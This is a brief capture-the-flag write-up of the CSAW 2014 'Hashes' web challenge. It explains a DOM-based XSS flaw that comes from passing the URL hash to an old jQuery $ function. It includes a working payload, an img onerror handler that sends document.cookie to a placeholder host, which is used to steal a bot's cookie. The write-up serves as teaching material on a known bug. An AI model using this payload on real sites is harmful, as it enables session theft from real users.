CSAW 2014 quals - Hashes (web300)
We are presented with a page that shows some pictures and has a form to submit links.
This JS code, together with the fact that a really old jQuery version was used (1.6.1), was really interesting:
tag = window.location.hash $(tag).show()
As stated in this bug report it is not safe to pass user input to the $ function as it is vulnerable to XSS.
We can submit this link to the bot and steal document.cookie:
http://220.127.116.11:7878/#<img src='AAA' onerror='document.location="http://cookiegrabber"+document.cookie'>`
This was a fairly easy challenge, the most difficult part was actually having the bot to visit our link as it was broken most of the time.
Thanks CSAW organizers for this really nice CTF!